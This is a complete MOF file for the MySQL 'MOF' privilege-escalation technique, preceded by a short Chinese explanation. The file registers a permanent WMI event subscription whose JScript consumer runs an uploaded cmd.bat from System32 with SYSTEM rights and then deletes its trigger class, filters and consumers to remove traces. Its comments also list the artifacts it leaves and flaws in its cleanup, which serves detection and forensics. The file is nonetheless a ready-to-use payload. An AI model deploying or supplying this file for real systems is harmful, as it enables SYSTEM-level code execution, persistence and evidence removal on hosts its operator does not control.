这个 SQL 提权 MOF 只能运行 system 目录下的文件，不能自定义路径。原因是 MOF 里嵌入的 JScript 并不是由 MySQL 进程执行，而是由 WMI 的 ActiveScriptEventConsumer 脚本宿主以 WMI 服务的身份（通常为 SYSTEM）执行的，`s.Run("cmd.bat")` 这类相对路径按该宿主进程的工作目录解析——作者观察到的是 %SystemRoot%\System32（MOF 里清理用的 `wbem\mof\good\hBsBa.mof` 也是按这个目录写的相对路径）。因此需要把要执行的命令写入一个 bat 文件，上传到 system32 目录，然后再触发 MOF 执行。
(English: this MOF-based escalation can only run a file from the system directory and cannot take an explicit path, because the embedded JScript runs in the WMI ActiveScriptEventConsumer host under the WMI service account — SYSTEM, per the author — and bare names such as `cmd.bat` resolve against that process's working directory, observed to be %SystemRoot%\System32. Hence the commands are written into a .bat, uploaded to System32, and then triggered.)
// Permanent WMI event subscription (filter + consumer + binding), installed
// into root\cimv2 when this file is compiled by mofcomp.  It is the payload of
// the MySQL "MOF" privilege-escalation trick described in the note above: the
// JScript in the consumers is executed by the WMI ActiveScriptEventConsumer
// host, not by the database process, so whatever cmd.bat does runs with the
// WMI service's privileges (SYSTEM, per the note) rather than MySQL's.
//
// Detection / forensics: the artifacts this leaves in root\cimv2 are the
// class MyClass547, __EventFilter "instfilt" / "qndfilt",
// ActiveScriptEventConsumer "ASEC" / "qndASEC", their
// __FilterToConsumerBinding instances, and the __Win32Provider +
// __EventConsumerProviderRegistration entries.  The self-cleanup in the
// consumers never removes the last two.
#pragma namespace("\\\\.\\root\\cimv2")

// Trigger class.  Creating an instance of it (see the very end of the file)
// raises the __InstanceCreationEvent that $Filt is watching for.
class MyClass547
{
    [key] string Name;
};

// ActiveScriptEventConsumer is normally registered in root\subscription, not
// root\cimv2, so the class is declared here and its provider is registered in
// this namespace below; that keeps the whole subscription inside one
// namespace instead of depending on an existing registration.
class ActiveScriptEventConsumer : __EventConsumer
{
    [key] string Name;
    [not_null] string ScriptingEngine;
    string ScriptFileName;
    [template] string ScriptText;
    uint32 KillTimeout;
};

// Provider registration for the consumer class declared above.  The CLSID is
// presumably that of the stock ActiveScriptEventConsumer provider -- verify
// against a reference root\subscription registration before relying on it.
instance of __Win32Provider as $P
{
    Name = "ActiveScriptEventConsumer";
    CLSID = "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
    PerUserInitialization = TRUE;
};

instance of __EventConsumerProviderRegistration
{
    Provider = $P;
    ConsumerClassNames = {"ActiveScriptEventConsumer"};
};

// Consumer 1 ("ASEC"): launches cmd.bat, then deletes the trigger class, its
// own filter and itself.  Notes:
//  - s.Run("cmd.bat") uses a bare relative name; it is resolved by the WMI
//    script host, whose working directory the note reports as
//    %SystemRoot%\System32 -- hence the requirement to drop the .bat there.
//  - Run is called without bWaitOnReturn, so it presumably returns at once
//    and the cleanup below starts while cmd.bat is still running.
//  - The binding $bind is not deleted explicitly; WMI is expected to drop a
//    binding once its filter/consumer are gone -- confirm on the target OS.
//  - Every step sits in a try/catch with an empty handler, so a failed
//    cleanup is silent and leaves the artifacts listed in the header.
Instance of ActiveScriptEventConsumer as $cons
{
    Name = "ASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";
};

// Consumer 2 ("qndASEC"): intended post-run cleanup.  It deletes the
// processed copy of this MOF (apparently the auto-compiler moves compiled
// files to wbem\mof\good\; "hBsBa.mof" must match the name the file was
// dropped under), deletes cmd.bat, then removes its own filter and itself.
// Paths are again relative to the script host's working directory.
// NOTE(review): whether this consumer ever fires depends on $Filt2 below --
// see the note there.
Instance of ActiveScriptEventConsumer as $cons2
{
    Name = "qndASEC";
    ScriptingEngine = "JScript";
    ScriptText = "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
};

// Filter 1: fires when an instance of MyClass547 is created.  No WITHIN
// clause, so this relies on WMI delivering the repository's own creation
// event without polling -- presumably fine for a static class like this one.
instance of __EventFilter as $Filt
{
    Name = "instfilt";
    Query = "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";
    QueryLanguage = "WQL";
};

// Filter 2: meant to fire when the process running cmd.bat exits, polled
// every second (WITHIN 1).
// NOTE(review): Win32_Process.Name is the image name of the process; a batch
// file is executed by cmd.exe, so a process named "cmd.bat" is not expected
// to exist and this filter presumably never matches.  If so, qndASEC never
// runs and cmd.bat, the compiled MOF, "qndfilt" and "qndASEC" remain on the
// host -- useful evidence for incident response, and the reason only the
// first consumer's cleanup can be counted on.
instance of __EventFilter as $Filt2
{
    Name = "qndfilt";
    Query = "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";
    QueryLanguage = "WQL";
};

// Bindings: wire each filter to its consumer.  These are what make the
// subscription live; without them the consumers above are inert.
instance of __FilterToConsumerBinding as $bind
{
    Consumer = $cons;
    Filter = $Filt;
};

instance of __FilterToConsumerBinding as $bind2
{
    Consumer = $cons2;
    Filter = $Filt2;
};

// The trigger: creating this instance raises the event $Filt matches, which
// makes $cons run cmd.bat.  It is placed last so that the filter, consumer
// and binding already exist when the creation event is raised.
instance of MyClass547 as $MyClass
{
    Name = "ClassConsumer";
};